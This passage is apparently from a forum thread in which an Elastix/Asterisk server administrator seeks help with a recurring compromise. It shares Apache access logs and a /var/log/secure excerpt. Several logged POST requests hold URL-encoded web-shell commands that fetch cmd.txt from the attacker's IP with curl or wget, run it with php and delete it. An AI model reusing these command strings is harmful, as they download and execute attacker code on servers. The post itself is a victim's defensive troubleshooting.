                    51.15.12.13 - - [10/Jun/2017:04:55:55 -0400] "POST /recordings/mcd.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:56 -0400] "POST /recordings/dmc.php?pass=dandan2017&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:56 -0400] "POST /recordings/cmd.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:57 -0400] "POST /recordings/mcd.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:57 -0400] "POST /recordings/dmc.php?pass=test&cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:55:58 -0400] "POST /recordings/config.amportal.php HTTP/1.1" 403 232
                    51.15.12.13 - - [10/Jun/2017:04:55:58 -0400] "POST /recordings/scan.php HTTP/1.1" 403 221
                    51.15.12.13 - - [10/Jun/2017:04:55:59 -0400] "POST /vtigercrm/a7a.php HTTP/1.1" 404 215
                    51.15.12.13 - - [10/Jun/2017:04:55:59 -0400] "POST /vtigercrm/Hima.php HTTP/1.1" 404 216
                    51.15.12.13 - - [10/Jun/2017:04:56:00 -0400] "POST /vtigercrm/xXx-mat.php HTTP/1.1" 404 219
                    51.15.12.13 - - [10/Jun/2017:04:56:00 -0400] "POST /vtigercrm/Himaa.php HTTP/1.1" 404 217
                    51.15.12.13 - - [10/Jun/2017:04:56:01 -0400] "POST /recordings/3Zz.php HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:56:01 -0400] "POST /vtigercrm/3Zz.php HTTP/1.1" 404 215
                    51.15.12.13 - - [10/Jun/2017:04:56:02 -0400] "POST /vtigercrm/zizo.php HTTP/1.1" 404 216
                    51.15.12.13 - - [10/Jun/2017:04:56:02 -0400] "POST /vtigercrm/ops.php HTTP/1.1" 404 215
                    51.15.12.13 - - [10/Jun/2017:04:56:03 -0400] "POST /vtigercrm/xXx-ELMAYET-xXx.php HTTP/1.1" 404 227
                    51.15.12.13 - - [10/Jun/2017:04:56:03 -0400] "POST /zz.php.call HTTP/1.1" 404 209
                    51.15.12.13 - - [10/Jun/2017:04:56:04 -0400] "POST /vtigercrm/z.php?pass=angel HTTP/1.1" 404 213
                    51.15.12.13 - - [10/Jun/2017:04:56:04 -0400] "POST /z.php?pass=angel HTTP/1.1" 404 203
                    51.15.12.13 - - [10/Jun/2017:04:56:05 -0400] "POST /recordings/lol.php HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:56:05 -0400] "POST /recordings/badr2.php HTTP/1.1" 403 222
                    51.15.12.13 - - [10/Jun/2017:04:56:06 -0400] "POST /recordings/Go.php HTTP/1.1" 403 219
                    51.15.12.13 - - [10/Jun/2017:04:56:06 -0400] "POST /recordings/info.php HTTP/1.1" 403 221
                    51.15.12.13 - - [10/Jun/2017:04:56:07 -0400] "POST /recordings/11.php HTTP/1.1" 403 219
                    51.15.12.13 - - [10/Jun/2017:04:56:07 -0400] "POST /vtigercrm/moaz.php HTTP/1.1" 404 216
                    51.15.12.13 - - [10/Jun/2017:04:56:08 -0400] "POST /vtigercrm/11.php HTTP/1.1" 404 214
                    51.15.12.13 - - [10/Jun/2017:04:56:08 -0400] "POST /11.php HTTP/1.1" 404 204
                    51.15.12.13 - - [10/Jun/2017:04:56:09 -0400] "POST /recordings/a8a.php HTTP/1.1" 403 220
                    51.15.12.13 - - [10/Jun/2017:04:56:09 -0400] "POST /wav.php HTTP/1.1" 404 205
                    51.15.12.13 - - [10/Jun/2017:04:56:10 -0400] "POST /_asterisk/V-E-M.php?268e31510577740=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 404 217
                    51.15.12.13 - - [10/Jun/2017:04:56:10 -0400] "POST /x1.php HTTP/1.1" 404 204
                    51.15.12.13 - - [10/Jun/2017:04:56:11 -0400] "POST /recordings/webadmin.php HTTP/1.1" 403 225
                    51.15.12.13 - - [10/Jun/2017:04:56:11 -0400] "POST /panel/webadmin.php HTTP/1.1" 404 216
                    51.15.12.13 - - [10/Jun/2017:04:56:12 -0400] "POST /webadmin.php HTTP/1.1" 404 210
                    51.15.12.13 - - [10/Jun/2017:04:56:12 -0400] "POST /panel/main.php HTTP/1.1" 404 212
                    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php?act=cmd HTTP/1.1" 404 212
                    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.1 HTTP/1.1" 404 214
                    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.1?act=cmd HTTP/1.1" 404 214
                    51.15.12.13 - - [10/Jun/2017:04:56:13 -0400] "POST /panel/main.php.2 HTTP/1.1" 404 214
                    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /panel/main.php.2?act=cmd HTTP/1.1" 404 214
                    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php HTTP/1.1" 403 221
                    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php?act=cmd HTTP/1.1" 403 221
                    51.15.12.13 - - [10/Jun/2017:04:56:14 -0400] "POST /recordings/main.php.1 HTTP/1.1" 403 223
                    51.15.12.13 - - [10/Jun/2017:04:56:15 -0400] "POST /recordings/main.php.1?act=cmd HTTP/1.1" 403 223
                    51.15.12.13 - - [10/Jun/2017:04:56:15 -0400] "POST /recordings/main.php.2 HTTP/1.1" 403 223
                    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /recordings/main.php.2?act=cmd HTTP/1.1" 403 223
                    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /main.php HTTP/1.1" 404 206
                    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /main.php?act=cmd HTTP/1.1" 404 206
                    51.15.12.13 - - [10/Jun/2017:04:56:16 -0400] "POST /vtigercrm/main.php HTTP/1.1" 404 216
                    51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /vtigercrm/main.php?act=cmd HTTP/1.1" 404 216
                    51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /config.all.php HTTP/1.1" 404 212
                    51.15.12.13 - - [10/Jun/2017:04:56:17 -0400] "POST /recordings/config.all.php HTTP/1.1" 403 227
                    51.15.12.13 - - [10/Jun/2017:04:56:18 -0400] "POST /panel/config.all.php HTTP/1.1" 404 218
                    51.15.12.13 - - [10/Jun/2017:04:56:18 -0400] "POST /vtigercrm/config.all.php HTTP/1.1" 404 222
                    51.15.12.13 - - [10/Jun/2017:04:56:19 -0400] "POST /admin/config.all.php HTTP/1.1" 404 218
                    51.15.12.13 - - [10/Jun/2017:04:56:19 -0400] "POST /0x4148.php.call HTTP/1.1" 404 213
                    51.15.12.13 - - [10/Jun/2017:04:56:20 -0400] "POST /recordings/misc/?cmd=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 403 218
                    51.15.12.13 - - [10/Jun/2017:04:56:20 -0400] "POST /graph.php?module=upload HTTP/1.1" 404 207
                    51.15.12.13 - - [10/Jun/2017:04:56:21 -0400] "POST /recordings/graph.php?module=upload HTTP/1.1" 403 222
                    51.15.12.13 - - [10/Jun/2017:04:56:21 -0400] "POST /vtigercrm/graph.php?module=upload HTTP/1.1" 404 217
                    51.15.12.13 - - [10/Jun/2017:04:56:22 -0400] "POST /vtigercrm/phpversions.php?module=upload HTTP/1.1" 404 223
                    51.15.12.13 - - [10/Jun/2017:04:56:22 -0400] "POST /recordings/phpversions.php?module=upload HTTP/1.1" 403 228
                    51.15.12.13 - - [10/Jun/2017:04:56:23 -0400] "POST /phpversions.php?module=upload HTTP/1.1" 404 213
                    216.218.206.66 - - [10/Jun/2017:06:00:25 -0400] "GET / HTTP/1.1" 200 5409
                    216.218.206.66 - - [10/Jun/2017:06:01:06 -0400] "GET / HTTP/1.1" 200 5409
                    183.129.160.229 - - [10/Jun/2017:06:21:05 -0400] "GET / HTTP/1.1" 200 5409
                    163.172.69.33 - - [10/Jun/2017:09:28:26 -0400] "GET / HTTP/1.0" 400 362
                    163.172.69.33 - - [10/Jun/2017:09:28:28 -0400] "GET /recordings//theme/main.css HTTP/1.1" 200 184
                    163.172.69.33 - - [10/Jun/2017:09:30:18 -0400] "POST /recordings/index.php HTTP/1.1" 500 -
                    163.172.69.33 - - [10/Jun/2017:09:30:20 -0400] "GET /recordings/misc/audio.php HTTP/1.1" 200 -
                    98.242.248.14 - - [10/Jun/2017:09:45:25 -0400] "GET / HTTP/1.1" 500 -

                      navaismo I did a recursive search for that file and it is only found on /tmp and /var/www/html/_asterisk

                      I delete them over and over but they come back...

                      I see strange POST commands on the access and ssl_access logs which I have already shared with you..

                      navaismo This is my /var/log/secure log for June 9th:

                      Jun 9 00:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 00:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 01:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 02:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 03:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session opened for user cyrus by (uid=0)
                      Jun 9 04:02:01 voicesrv01 runuser: pam_unix(runuser-l:session): session closed for user cyrus
                      Jun 9 04:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 04:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 05:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 06:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 07:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 08:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
                      Jun 9 09:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
